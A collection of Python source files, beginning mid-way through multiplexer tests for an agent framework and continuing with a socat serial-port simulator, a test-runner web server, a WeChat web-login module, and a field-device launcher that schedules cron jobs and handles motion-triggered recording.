os.chdir(Path(self.t, self.agent_name)) result = self.runner.invoke( cli, [*CLI_LOG_OPTION, "generate-key", DEFAULT_LEDGER, self.key_path] ) assert result.exit_code == 0, result.stdout_bytes result = self.runner.invoke( cli, [*CLI_LOG_OPTION, "add-key", DEFAULT_LEDGER, self.key_path] ) assert result.exit_code == 0, result.stdout_bytes def test_multiplexer_disconnected_on_early_interruption(self): """Test multiplexer disconnected properly on termination before connected.""" result = self.runner.invoke( cli, [*CLI_LOG_OPTION, "add", "--local", "connection", str(P2P_PUBLIC_ID)] ) assert result.exit_code == 0, result.stdout_bytes result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "build"]) assert result.exit_code == 0, result.stdout_bytes result = self.runner.invoke( cli, [*CLI_LOG_OPTION, "generate-key", DEFAULT_LEDGER, self.conn_key_path] ) assert result.exit_code == 0, result.stdout_bytes result = self.runner.invoke( cli, [ *CLI_LOG_OPTION, "add-key", DEFAULT_LEDGER, self.conn_key_path, "--connection", ], ) assert result.exit_code == 0, result.stdout_bytes result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "issue-certificates"]) assert result.exit_code == 0, result.stdout_bytes self.proc = PexpectWrapper( # nosec [sys.executable, "-m", "aea.cli", "-v", "DEBUG", "run"], env=os.environ, maxread=10000, encoding="utf-8", logfile=sys.stdout, ) self.proc.expect_all( ["Starting libp2p node..."], timeout=50, ) self.proc.control_c() self.proc.expect_all( ["Multiplexer .*disconnected."], timeout=20, strict=False, ) self.proc.expect_all( [EOF], timeout=20, ) def test_multiplexer_disconnected_on_termination_after_connected_no_connection( self, ): """Test multiplexer disconnected properly on termination after connected.""" self.proc = PexpectWrapper( # nosec [sys.executable, "-m", "aea.cli", "-v", "DEBUG", "run"], env=os.environ, maxread=10000, encoding="utf-8", logfile=sys.stdout, ) self.proc.expect_all( ["Start processing messages..."], timeout=20, ) self.proc.control_c() self.proc.expect_all( ["Multiplexer disconnecting...", "Multiplexer disconnected.", EOF], timeout=20, ) def test_multiplexer_disconnected_on_termination_after_connected_one_connection( self, ): """Test multiplexer disconnected properly on termination after connected.""" result = self.runner.invoke( cli, [*CLI_LOG_OPTION, "add", "--local", "connection", str(STUB_CONNECTION_ID)], ) assert result.exit_code == 0, result.stdout_bytes self.proc = PexpectWrapper( # nosec [sys.executable, "-m", "aea.cli", "-v", "DEBUG", "run"], env=os.environ, maxread=10000, encoding="utf-8", logfile=sys.stdout, ) self.proc.expect_all( ["Start processing messages..."], timeout=20, ) self.proc.control_c() self.proc.expect_all( ["Multiplexer disconnecting...", "Multiplexer disconnected.", EOF], timeout=20, ) def teardown(self): """Tear the test down.""" if self.proc: self.proc.wait_to_complete(10) os.chdir(self.cwd) try: shutil.rmtree(self.t) except (OSError, IOError): pass def test_multiplexer_setup_replaces_connections(): """Test proper connections reset on setup call.""" m = AsyncMultiplexer([MagicMock(), MagicMock(), MagicMock()]) assert len(m._id_to_connection) == 3 assert len(m._connections) == 3 m._setup([MagicMock()], MagicMock()) assert len(m._id_to_connection) == 1 assert len(m._connections) == 1 def test_connect_after_disconnect_sync(): """Test connect-disconnect-connect again for threaded multiplexer.""" multiplexer = Multiplexer([_make_dummy_connection()]) assert not multiplexer.connection_status.is_connected multiplexer.connect() assert 
multiplexer.connection_status.is_connected multiplexer.disconnect() assert not multiplexer.connection_status.is_connected multiplexer.connect() assert multiplexer.connection_status.is_connected multiplexer.disconnect() assert not multiplexer.connection_status.is_connected @pytest.mark.asyncio async def test_connect_after_disconnect_async(): """Test connect-disconnect-connect again for async multiplexer.""" multiplexer = AsyncMultiplexer([_make_dummy_connection()]) assert not multiplexer.connection_status.is_connected await multiplexer.connect() assert multiplexer.connection_status.is_connected await multiplexer.disconnect() assert not multiplexer.connection_status.is_connected await multiplexer.connect() assert multiplexer.connection_status.is_connected await multiplexer.disconnect() assert not multiplexer.connection_status.is_connected @pytest.mark.asyncio async def test_connection_timeouts(): """Test connect,send, disconnect timeouts for connections.""" async def slow_fn(*asrgs, **kwargs): await asyncio.sleep(100) connection = _make_dummy_connection() envelope = Envelope( to="", sender="", message=DefaultMessage(performative=DefaultMessage.Performative.BYTES), context=EnvelopeContext(connection_id=connection.connection_id), ) connection = _make_dummy_connection() connection.connect = slow_fn multiplexer = AsyncMultiplexer([connection]) multiplexer.CONNECT_TIMEOUT = 0.1 with pytest.raises(AEAConnectionError, match=r"TimeoutError"): await multiplexer.connect() connection = _make_dummy_connection() connection.send = slow_fn multiplexer = AsyncMultiplexer([connection]) multiplexer.SEND_TIMEOUT = 0.1 await multiplexer.connect() with pytest.raises(asyncio.TimeoutError): await multiplexer._send(envelope) await multiplexer.disconnect() connection = _make_dummy_connection() connection.disconnect = slow_fn multiplexer = AsyncMultiplexer([connection]) multiplexer.DISCONNECT_TIMEOUT = 0.1 await multiplexer.connect() with pytest.raises( AEAConnectionError, match=f"Failed to disconnect multiplexer, some connections are not disconnected.*{str(connection.connection_id)}", ): await multiplexer.disconnect() @pytest.mark.asyncio async def test_stops_on_connectionerror_during_connect(): """Test multiplexer stopped and reraise exception on connect fails on conection.connect with AEAConnectionError.""" connection = _make_dummy_connection() multiplexer = AsyncMultiplexer([connection]) with patch.object( connection, "connect", side_effect=AEAConnectionError("expected") ): with pytest.raises(AEAConnectionError, match=r"expected"): await multiplexer.connect() assert multiplexer.connection_status.is_disconnected
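Many of the assertions in the tests above follow one pattern: patch a single logger method on the object under test and assert the exact message that was emitted. The following self-contained illustration uses a throwaway Service class instead of the Multiplexer; the class and message text are hypothetical.

import logging
import unittest.mock


class Service:
    def __init__(self):
        self.logger = logging.getLogger("service")
        self.connected = False

    def connect(self):
        if self.connected:
            self.logger.debug("Service already connected.")
            return
        self.connected = True


def test_connect_twice_logs_debug():
    service = Service()
    service.connect()
    with unittest.mock.patch.object(service.logger, "debug") as mock_debug:
        service.connect()  # second call should only log, not reconnect
    mock_debug.assert_called_with("Service already connected.")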
simulate_serial.py
#!/usr/bin/env python3 import logging import subprocess import sys import threading import time sys.path.append('.') from logger.readers.logfile_reader import LogfileReader from logger.transforms.slice_transform import SliceTransform from logger.writers.text_file_writer import TextFileWriter from logger.utils.read_json import read_json ################################################################################ class SimSerial: """Create a virtual serial port and feed stored logfile data to it.""" ############################ def __init__(self, port, source_file, use_timestamps=True, baudrate=9600, bytesize=8, parity='N', stopbits=1, timeout=None, xonxoff=False, rtscts=False, write_timeout=None, dsrdtr=False, inter_byte_timeout=None, exclusive=None): """Takes source file, whether to deliver data at rate indicated by timestamps, and the standard parameters that a serial port takes.""" self.source_file = source_file self.use_timestamps = use_timestamps # We'll create two virtual ports: 'port' and 'port_in'; we will write # to port_in and read the values back out from port self.read_port = port self.write_port = port + '_in' self.serial_params = {'baudrate': baudrate, 'byteside': bytesize, 'parity': parity, 'stopbits': stopbits, 'timeout': timeout, 'xonxoff': xonxoff, 'rtscts': rtscts, 'write_timeout': write_timeout, 'dsrdtr': dsrdtr, 'inter_byte_timeout': inter_byte_timeout, 'exclusive': exclusive} self.quit = False # Finally, check that our needed 'socat' actually exists if not subprocess.run(['which', 'socat'], stdout=subprocess.PIPE).stdout: raise NameError('Executable "socat" not found on path. Please refer ' 'to installation guide to install socat.') ############################ def _run_socat(self): """Internal: run the actual command.""" verbose = '-d' write_port_params = 'pty,link=%s,raw,echo=0' % self.write_port read_port_params = 'pty,link=%s,raw,echo=0' % self.read_port cmd = ['/usr/bin/env', 'socat', verbose, #verbose, # repeating makes it more verbose read_port_params, write_port_params, ] try: # Run socat process using Popen, checking every second or so whether # it's died (poll() != None) or we've gotten a quit signal. logging.info('Calling: %s', ' '.join(cmd)) socat_process = subprocess.Popen(cmd) while not self.quit and not socat_process.poll(): try: socat_process.wait(1) except subprocess.TimeoutExpired: pass except Exception as e: logging.error('ERROR: socat command: %s', e) # If here, process has terminated, or we've seen self.quit. We # want both to be true: if we've terminated, set self.quit so that # 'run' loop can exit. If self.quit, terminate process. if self.quit: socat_process.kill() else: self.quit = True logging.info('Finished: %s', ' '.join(cmd)) ############################ def run(self, loop=False): """Create the virtual port with socat and start feeding it records from the designated logfile. If loop==True, loop when reaching end of input.""" self.socat_thread = threading.Thread(target=self._run_socat) self.socat_thread.start() time.sleep(0.2) self.reader = LogfileReader(filebase=self.source_file, use_timestamps=self.use_timestamps) self.strip = SliceTransform('1:') # strip off the first field) self.writer = TextFileWriter(self.write_port, truncate=True) while not self.quit: record = self.reader.read() # get the next record logging.debug('SimSerial got: %s', record) # End of input? 
If loop==True, re-open the logfile from the start if record is None: if not loop: break self.reader = LogfileReader(filebase=self.source_file, use_timestamps=self.use_timestamps) record = self.strip.transform(record) # strip the timestamp if record: logging.debug('SimSerial writing: %s', record) self.writer.write(record) # and write it to the virtual port # If we're here, we got None from our input, and are done. Signal # for run_socat to exit self.quit = True ################################################################################ if __name__ == '__main__': import argparse parser = argparse.ArgumentParser() parser.add_argument('--config', dest='config', default=None, help='Config file of JSON specs for port-file mappings.') parser.add_argument('--logfile', dest='logfile', help='Log file to read from.') parser.add_argument('--loop', dest='loop', action='store_true', help='If True, loop when reaching end of sample data') parser.add_argument('--port', dest='port', help='Virtual serial port to open') parser.add_argument('--baud', dest='baud', type=int, help='Baud rate for port.') parser.add_argument('-v', '--verbosity', dest='verbosity', default=0, action='count', help='Increase output verbosity') args = parser.parse_args() LOGGING_FORMAT = '%(asctime)-15s %(message)s' logging.basicConfig(format=LOGGING_FORMAT) LOG_LEVELS ={0:logging.WARNING, 1:logging.INFO, 2:logging.DEBUG} args.verbosity = min(args.verbosity, max(LOG_LEVELS)) logging.getLogger().setLevel(LOG_LEVELS[args.verbosity]) # Okay - get to work here if args.config: configs = read_json(args.config) logging.info('Read configs: %s', configs) thread_list = [] for inst in configs: config = configs[inst] sim = SimSerial(port=config['port'], source_file=config['logfile']) sim_thread = threading.Thread(target=sim.run, kwargs={'loop': args.loop}) sim_thread.start() thread_list.append(sim_thread) logging.warning('Running simulated ports for %s', ', '.join(configs.keys())) for thread in thread_list: thread.join() # If no config file, just a simple, single serial port elif args.logfile and args.port: sim_serial = SimSerial(port=args.port, baudrate=args.baud, source_file=args.logfile) sim_serial.run(args.loop) # Otherwise, we don't have enough information to run else: parser.error('Either --config or both --logfile and --port must ' 'be specified')
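For the --config path, the __main__ block above expects a JSON file that maps an instrument name to its 'port' and 'logfile'. A hypothetical mapping, shown here in its parsed Python form with placeholder names and paths, would look like this:

# Hypothetical parsed form of a --config JSON file: one entry per simulated
# instrument, each giving the virtual serial port to create and the logfile
# whose records should be replayed onto it.
example_configs = {
    "gyro": {"port": "/tmp/tty_gyro", "logfile": "/data/logs/gyro/gyro_log"},
    "seapath": {"port": "/tmp/tty_seapath", "logfile": "/data/logs/seapath/seapath_log"},
}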
webserver.py
import time import urllib.parse import threading import traceback import json import nose import sys import linecache import inspect import os.path import http.server import socketserver import queue as queue from mpi4py import MPI from nose.plugins.capture import Capture from nose.plugins.skip import Skip, SkipTest from nose.core import TestProgram from multiprocessing import Process, Queue from optparse import OptionParser from subprocess import call, Popen, PIPE from io import StringIO EDITOR = None osascript_to_open_xcode = """on run argv set linenumber to (item 1 of argv) as integer set filename_string to item 2 of argv set file_to_open to POSIX file filename_string tell application "Xcode" activate set doc_to_edit to (open file_to_open) tell doc_to_edit set its selection to item linenumber of paragraph of it end tell end tell end run""" def open_file(path, lineno = 1): global EDITOR if sys.platform == 'darwin': program = Popen( ['osascript', '-', str(lineno), os.path.join(os.getcwd(), path) ], stdin = PIPE, stdout = PIPE, stderr = PIPE) out, err = program.communicate(osascript_to_open_xcode) else: possible_programs = ( ['geany', path, '+'+str(lineno)], ['kate', '-u', '--line',str(lineno),path], ['emacs', '+'+str(lineno), path], ['nedit-client','-line', str(lineno), path], ) for program in possible_programs: if program[0] == EDITOR: returncode = call(['which', program[0]]) if returncode == 0: call(program) return for program in possible_programs: returncode = call(['which', program[0]]) if returncode == 0: call(program) return call([EDITOR, path]) class HandleRequest(http.server.BaseHTTPRequestHandler): def do_GET(self): self.parsed_path = urllib.parse.urlparse(self.path) path = self.parsed_path.path[1:] method_name = 'do_' + path if hasattr(self, method_name): method = getattr(self,method_name) string, content_type = method() else: if path.endswith(".js"): string, content_type = self.javascript_file(path) else: string, content_type = self.index_file() self.send_response(200) self.send_header("Content-type", content_type) self.send_header("Content-Length", str(len(string))) self.end_headers() self.wfile.write(string) def do_long_poll(self): self.send_response(200) self.send_header("Content-Type", "text/javascript") self.send_header("Transfer-Encoding", "chunked") self.send_header("Cache-Control", "no-cache, no-store") self.send_header("Pragma", "no-cache") self.end_headers() while True: self.server.tests_finished.wait(10.0) if self.server.tests_finished.is_set(): self.send_chunk('true') self.server.tests_finished.clear() else: self.send_chunk('false') self.wfile.write('0\r\n\r\n') self.wfile.flush() def send_chunk(self, string): hex_length = hex(len(string))[2:] self.wfile.write('%s \r\n' % hex_length) self.wfile.flush() self.wfile.write(string) self.wfile.write('\r\n') self.wfile.flush() def index_file(self): base = os.path.split(__file__)[0] filename = os.path.join(base, "realtime_test.html") with open(filename, "r") as file: contents = file.read() return contents, 'text/html' def javascript_file(self, path): base = os.path.split(__file__)[0] filename = os.path.join(base, path) if not os.path.exists(path): return '', 'text/javascript' with open(filename, "r") as file: contents = file.read() return contents, 'text/javascript' def log_message(self, format, *args): pass #sys.stderr.write("%s - - [%s] %s\n" % # (self.address_string(), # self.log_date_time_string(), # format%args)) def do_stop(self): thread = threading.Thread(target=self.server.stop) thread.daemon = True; thread.start() 
return 'null', 'text/javascript' def do_events(self): new_events = self.server.get_all_events_since_previous_query() string = json.dumps(new_events) content_type = 'text/javascript' return string, content_type def do_open_file(self): parameters = urllib.parse.parse_qs(self.parsed_path.query) path = parameters['path'][0] lineno = int(parameters['lineno'][0]) open_file(path, lineno) string = 'null' content_type = 'text/javascript' return string, content_type class WebServer(socketserver.ThreadingMixIn, http.server.HTTPServer): def __init__(self, port, request_handler): http.server.HTTPServer.__init__(self, ('', port), request_handler) self.daemon_threads = True self.events_queue = queue.Queue() def start(self): self.serve_forever() def stop(self): self.shutdown() def get_all_events_since_previous_query(self): try: events = [] while True: events.append(self.events_queue.get(False)) except queue.Empty: pass return events
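A hedged usage sketch for the module above: run the WebServer on a background thread, feed a couple of events into events_queue (whatever accumulates there is returned as JSON by the /events handler), then stop it. The port number and event dictionaries are placeholders; the sketch reuses the classes and imports already defined in this file.

if __name__ == '__main__':
    server = WebServer(8990, HandleRequest)               # arbitrary port
    server_thread = threading.Thread(target=server.start)
    server_thread.daemon = True
    server_thread.start()

    # Anything placed on events_queue is drained on the next /events poll.
    server.events_queue.put({'type': 'test-started', 'name': 'test_example'})
    server.events_queue.put({'type': 'test-passed', 'name': 'test_example'})

    time.sleep(30)                                        # leave time to query the server
    server.stop()
    server_thread.join()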
login.py
import os, sys, time, re, io import threading import json, xml.dom.minidom import copy, pickle, random import traceback, logging try: from httplib import BadStatusLine except ImportError: from http.client import BadStatusLine import requests from pyqrcode import QRCode from .. import config, utils from ..returnvalues import ReturnValue from ..storage.templates import wrap_user_dict from .contact import update_local_chatrooms, update_local_friends from .messages import produce_msg logger = logging.getLogger('itchat') def load_login(core): core.login = login core.get_QRuuid = get_QRuuid core.get_QR = get_QR core.check_login = check_login core.web_init = web_init core.show_mobile_login = show_mobile_login core.start_receiving = start_receiving core.get_msg = get_msg core.logout = logout def login(self, enableCmdQR=False, picDir=None, qrCallback=None, loginCallback=None, exitCallback=None): if self.alive or self.isLogging: logger.warning('itchat has already logged in.') return self.isLogging = True while self.isLogging: uuid = push_login(self) if uuid: qrStorage = io.BytesIO() else: logger.info('Getting uuid of QR code.') while not self.get_QRuuid(): time.sleep(1) logger.info('Downloading QR code.') qrStorage = self.get_QR(enableCmdQR=enableCmdQR, picDir=picDir, qrCallback=qrCallback) logger.info('Please scan the QR code to log in.') isLoggedIn = False while not isLoggedIn: status = self.check_login() if hasattr(qrCallback, '__call__'): qrCallback(uuid=self.uuid, status=status, qrcode=qrStorage.getvalue()) if status == '200': isLoggedIn = True elif status == '201': if isLoggedIn is not None: logger.info('Please press confirm on your phone.') isLoggedIn = None elif status != '408': break if isLoggedIn: break elif self.isLogging: logger.info('Log in time out, reloading QR code.') else: return # log in process is stopped by user logger.info('Loading the contact, this may take a little while.') self.web_init() self.show_mobile_login() self.get_contact(True) if hasattr(loginCallback, '__call__'): r = loginCallback() else: utils.clear_screen() if os.path.exists(picDir or config.DEFAULT_QR): os.remove(picDir or config.DEFAULT_QR) logger.info('Login successfully as %s' % self.storageClass.nickName) self.start_receiving(exitCallback) self.isLogging = False def push_login(core): cookiesDict = core.s.cookies.get_dict() if 'wxuin' in cookiesDict: url = '%s/cgi-bin/mmwebwx-bin/webwxpushloginurl?uin=%s' % ( config.BASE_URL, cookiesDict['wxuin']) headers = { 'User-Agent' : config.USER_AGENT } r = core.s.get(url, headers=headers).json() if 'uuid' in r and r.get('ret') in (0, '0'): core.uuid = r['uuid'] return r['uuid'] return False def get_QRuuid(self): url = '%s/jslogin' % config.BASE_URL params = { 'appid' : 'wx782c26e4c19acffb', 'fun' : 'new', } headers = { 'User-Agent' : config.USER_AGENT } r = self.s.get(url, params=params, headers=headers) regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)";' data = re.search(regx, r.text) if data and data.group(1) == '200': self.uuid = data.group(2) return self.uuid def get_QR(self, uuid=None, enableCmdQR=False, picDir=None, qrCallback=None): uuid = uuid or self.uuid picDir = picDir or config.DEFAULT_QR qrStorage = io.BytesIO() qrCode = QRCode('https://login.weixin.qq.com/l/' + uuid) qrCode.png(qrStorage, scale=10) if hasattr(qrCallback, '__call__'): qrCallback(uuid=uuid, status='0', qrcode=qrStorage.getvalue()) else: if enableCmdQR: utils.print_cmd_qr(qrCode.text(1), enableCmdQR=enableCmdQR) else: with open(picDir, 'wb') as f: 
f.write(qrStorage.getvalue()) utils.print_qr(picDir) return qrStorage def check_login(self, uuid=None): uuid = uuid or self.uuid url = '%s/cgi-bin/mmwebwx-bin/login' % config.BASE_URL localTime = int(time.time()) params = 'loginicon=true&uuid=%s&tip=0&r=%s&_=%s' % ( uuid, localTime / 1579, localTime) headers = { 'User-Agent' : config.USER_AGENT } r = self.s.get(url, params=params, headers=headers) regx = r'window.code=(\d+)' data = re.search(regx, r.text) if data and data.group(1) == '200': if process_login_info(self, r.text): return '200' else: return '400' elif data: return data.group(1) else: return '400' def process_login_info(core, loginContent): ''' when finish login (scanning qrcode) * syncUrl and fileUploadingUrl will be fetched * deviceid and msgid will be generated * skey, wxsid, wxuin, pass_ticket will be fetched ''' regx = r'window.redirect_uri="(\S+)";' core.loginInfo['url'] = re.search(regx, loginContent).group(1) headers = { 'User-Agent' : config.USER_AGENT } r = core.s.get(core.loginInfo['url'], headers=headers, allow_redirects=False) core.loginInfo['url'] = core.loginInfo['url'][:core.loginInfo['url'].rfind('/')] for indexUrl, detailedUrl in ( ("wx2.qq.com" , ("file.wx2.qq.com", "webpush.wx2.qq.com")), ("wx8.qq.com" , ("file.wx8.qq.com", "webpush.wx8.qq.com")), ("qq.com" , ("file.wx.qq.com", "webpush.wx.qq.com")), ("web2.wechat.com" , ("file.web2.wechat.com", "webpush.web2.wechat.com")), ("wechat.com" , ("file.web.wechat.com", "webpush.web.wechat.com"))): fileUrl, syncUrl = ['https://%s/cgi-bin/mmwebwx-bin' % url for url in detailedUrl] if indexUrl in core.loginInfo['url']: core.loginInfo['fileUrl'], core.loginInfo['syncUrl'] = \ fileUrl, syncUrl break else: core.loginInfo['fileUrl'] = core.loginInfo['syncUrl'] = core.loginInfo['url'] core.loginInfo['deviceid'] = 'e' + repr(random.random())[2:17] core.loginInfo['BaseRequest'] = {} for node in xml.dom.minidom.parseString(r.text).documentElement.childNodes: if node.nodeName == 'skey': core.loginInfo['skey'] = core.loginInfo['BaseRequest']['Skey'] = node.childNodes[0].data elif node.nodeName == 'wxsid': core.loginInfo['wxsid'] = core.loginInfo['BaseRequest']['Sid'] = node.childNodes[0].data elif node.nodeName == 'wxuin': core.loginInfo['wxuin'] = core.loginInfo['BaseRequest']['Uin'] = node.childNodes[0].data elif node.nodeName == 'pass_ticket': core.loginInfo['pass_ticket'] = core.loginInfo['BaseRequest']['DeviceID'] = node.childNodes[0].data if not all([key in core.loginInfo for key in ('skey', 'wxsid', 'wxuin', 'pass_ticket')]): logger.error('Your wechat account may be LIMITED to log in WEB wechat, error info:\n%s' % r.text) core.isLogging = False return False return True def web_init(self): url = '%s/webwxinit?r=%s' % (self.loginInfo['url'], int(time.time())) data = { 'BaseRequest': self.loginInfo['BaseRequest'], } headers = { 'ContentType': 'application/json; charset=UTF-8', 'User-Agent' : config.USER_AGENT, } r = self.s.post(url, data=json.dumps(data), headers=headers) dic = json.loads(r.content.decode('utf-8', 'replace')) # deal with login info utils.emoji_formatter(dic['User'], 'NickName') self.loginInfo['InviteStartCount'] = int(dic['InviteStartCount']) self.loginInfo['User'] = wrap_user_dict(utils.struct_friend_info(dic['User'])) self.memberList.append(self.loginInfo['User']) self.loginInfo['SyncKey'] = dic['SyncKey'] self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val']) for item in dic['SyncKey']['List']]) self.storageClass.userName = dic['User']['UserName'] self.storageClass.nickName = 
dic['User']['NickName'] # deal with contact list returned when init contactList = dic.get('ContactList', []) chatroomList, otherList = [], [] for m in contactList: if m['Sex'] != 0: otherList.append(m) elif '@@' in m['UserName']: m['MemberList'] = [] # don't let dirty info pollute the list chatroomList.append(m) elif '@' in m['UserName']: # mp will be dealt in update_local_friends as well otherList.append(m) if chatroomList: update_local_chatrooms(self, chatroomList) if otherList: update_local_friends(self, otherList) return dic def show_mobile_login(self): url = '%s/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % ( self.loginInfo['url'], self.loginInfo['pass_ticket']) data = { 'BaseRequest' : self.loginInfo['BaseRequest'], 'Code' : 3, 'FromUserName' : self.storageClass.userName, 'ToUserName' : self.storageClass.userName, 'ClientMsgId' : int(time.time()), } headers = { 'ContentType': 'application/json; charset=UTF-8', 'User-Agent' : config.USER_AGENT, } r = self.s.post(url, data=json.dumps(data), headers=headers) return ReturnValue(rawResponse=r) def start_receiving(self, exitCallback=None, getReceivingFnOnly=False): self.alive = True def maintain_loop(): retryCount = 0 while self.alive: try: i = sync_check(self) if i is None: self.alive = False elif i == '0': pass else: msgList, contactList = self.get_msg() if msgList: msgList = produce_msg(self, msgList) for msg in msgList: self.msgList.put(msg) if contactList: chatroomList, otherList = [], [] for contact in contactList: if '@@' in contact['UserName']: chatroomList.append(contact) else: otherList.append(contact) chatroomMsg = update_local_chatrooms(self, chatroomList) chatroomMsg['User'] = self.loginInfo['User'] self.msgList.put(chatroomMsg) update_local_friends(self, otherList) retryCount = 0 except requests.exceptions.ReadTimeout: pass except: retryCount += 1 logger.error(traceback.format_exc()) if self.receivingRetryCount < retryCount: self.alive = False else: time.sleep(1) self.logout() if hasattr(exitCallback, '__call__'): exitCallback() else: logger.info('LOG OUT!') if getReceivingFnOnly: return maintain_loop else: maintainThread = threading.Thread(target=maintain_loop) maintainThread.setDaemon(True) maintainThread.start() def sync_check(self): url = '%s/synccheck' % self.loginInfo.get('syncUrl', self.loginInfo['url']) params = { 'r' : int(time.time() * 1000), 'skey' : self.loginInfo['skey'], 'sid' : self.loginInfo['wxsid'], 'uin' : self.loginInfo['wxuin'], 'deviceid' : self.loginInfo['deviceid'], 'synckey' : self.loginInfo['synckey'], '_' : int(time.time() * 1000),} headers = { 'User-Agent' : config.USER_AGENT } try: r = self.s.get(url, params=params, headers=headers, timeout=config.TIMEOUT) except requests.exceptions.ConnectionError as e: try: if not isinstance(e.args[0].args[1], BadStatusLine): raise # will return a package with status '0 -' # and value like: # 6f:00:8a:9c:09:74:e4:d8:e0:14:bf:96:3a:56:a0:64:1b:a4:25:5d:12:f4:31:a5:30:f1:c6:48:5f:c3:75:6a:99:93 # seems like status of typing, but before I make further achievement code will remain like this return '2' except: raise r.raise_for_status() regx = r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}' pm = re.search(regx, r.text) if pm is None or pm.group(1) != '0': logger.debug('Unexpected sync check result: %s' % r.text) return None return pm.group(2) def get_msg(self): url = '%s/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % ( self.loginInfo['url'], self.loginInfo['wxsid'], self.loginInfo['skey'],self.loginInfo['pass_ticket']) data = { 'BaseRequest' : 
self.loginInfo['BaseRequest'], 'SyncKey' : self.loginInfo['SyncKey'], 'rr' : ~int(time.time()), } headers = { 'ContentType': 'application/json; charset=UTF-8', 'User-Agent' : config.USER_AGENT } r = self.s.post(url, data=json.dumps(data), headers=headers, timeout=config.TIMEOUT) dic = json.loads(r.content.decode('utf-8', 'replace')) if dic['BaseResponse']['Ret'] != 0: return None, None self.loginInfo['SyncKey'] = dic['SyncCheckKey'] self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val']) for item in dic['SyncCheckKey']['List']]) return dic['AddMsgList'], dic['ModContactList'] def logout(self): if self.alive: url = '%s/webwxlogout' % self.loginInfo['url'] params = { 'redirect' : 1, 'type' : 1, 'skey' : self.loginInfo['skey'], } headers = { 'User-Agent' : config.USER_AGENT } self.s.get(url, params=params, headers=headers) self.alive = False self.isLogging = False self.s.cookies.clear() del self.chatroomList[:] del self.memberList[:] del self.mpList[:] return ReturnValue({'BaseResponse': { 'ErrMsg': 'logout successfully.', 'Ret': 0, }})
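As a stand-alone check of the parsing done in sync_check() above (not part of itchat): the regex pulls retcode and selector out of the synccheck reply, retcode '0' means the session is still valid, and maintain_loop() fetches new data whenever the returned selector is anything other than '0'.

import re


def parse_synccheck(text):
    """Return the selector when retcode is '0', otherwise None (session invalid)."""
    regx = r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}'
    pm = re.search(regx, text)
    if pm is None or pm.group(1) != '0':
        return None
    return pm.group(2)


assert parse_synccheck('window.synccheck={retcode:"0",selector:"2"}') == '2'
assert parse_synccheck('window.synccheck={retcode:"1101",selector:"0"}') is None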
launch.py
#!/usr/bin/env python3 #import sys #sys.path.append("./lib") import os import crontab from signal import pause from time import sleep from threading import Thread, ThreadError from lib.log import logger from lib.audiomoth import audiomoth from lib.camera import camera from lib.diskio import diskio from lib.config import cfg from lib.event import event, latest_event, event_queue from lib.power import PiJuicePower as Power from datetime import datetime, timedelta c = camera() am = audiomoth() d = diskio() p = Power() pij = p.pij def app_path(): return os.path.dirname(os.path.abspath(__file__)) def job_path(): return app_path() + '/jobs' def install_cron_job(tab:crontab.CronTab, command:str, comment:str): jobs_by_comment = tab.find_comment(comment) for job in jobs_by_comment: if job.comment == comment: return job return tab.new(command=command, comment=comment) def install_cron_jobs(): tab = crontab.CronTab(user=True) install_cron_job(tab,f'{job_path()}/job_launch.sh','job0').minute.every(10) install_cron_job(tab,f'{job_path()}/job_git_pull.sh','job1').minute.every(10) install_cron_job(tab,f'{job_path()}/job_cleanup.sh','job2').hour.every(2) install_cron_job(tab,f'{job_path()}/job_check_power.py','job3').hour.every(30) install_cron_job(tab,f'{job_path()}/job_network_switch.sh','job4').minute.every(1) install_cron_job(tab,f'{job_path()}/job_reverse_ssh.sh','job5').hour.every(1) install_cron_job(tab,f'{job_path()}/job_send_heartbeat.py','job6').minute.every(1) install_cron_job(tab,f'{job_path()}/job_sync_aws.sh','job7').minute.every(15) tab.write() def on_motion(): # Creating a new event automatically logs it e = event() logger.info("on_motion") c.click(cfg.camera.photo_count, cfg.camera.photo_delay_sec, f'Event:{e.id}') init_sleep = e.get_seconds_until_stop() sleep(init_sleep if init_sleep > 0 else 1) return e def on_no_motion(e:event): logger.info("on_no_motion") print("Recording stopping") x = Thread(target=am.mountMoth, args=()) x.start() x.join() print("Transferring audio") d.transfer_audio(cfg.paths.audiomoth, cfg.paths.recordings, e) print("Transferred audio") y = Thread(target=am.unmountMoth, args=()) y.start() y.join() print("Recording started") def movement(e:event): m = int(pij.status.GetIoDigitalInput(2)['data']) print(m, end='', flush=True) return m def check_restart(): if cfg.is_restart_required(): print('Restarting') d.sendmail(f"{cfg.name} Server Restarting", f"{cfg.name} Server Restarting", cfg.emailto) logger.info('Restarting') am.unmountMoth() cfg.restart_clear() exit() def check_reboot(): if cfg.is_reboot_required(): print('Rebooting') logger.info('Rebooting') d.sendmail(f"{cfg.name} Server Restarting", f"{cfg.name} Server Rebooting", cfg.emailto) am.unmountMoth() cfg.reboot_clear() cfg.stop_clear() os.system('sudo shutdown -r 1') def check_power(): if p.should_sleep(): status = p.status() print('Pi powerdown due to Power state') logger.info(f'Pi powerdown due to Power state: {status}') d.sendmail(f'{cfg.name} Server Powerdown', f'{cfg.name} Server Powerdown \n{status}', cfg.emailto) def send_status_email(): global send_status_email_at now = datetime.utcnow() if send_status_email_at is None: send_status_email_at = now if send_status_email_at <= now: send_status_email_at = now + timedelta(minutes = 5) power = p.status() wifi_details = d.wifi_details() wifi_networks = d.wifi_networks() d.sendmail(cfg.name, f"{cfg.name} Server Starting\nWiFi\n{wifi_details}\nNetworks\n{wifi_networks}\npower\n{power}", cfg.emailto) attempt=1 max_attempt=3 success=False send_status_email_at = 
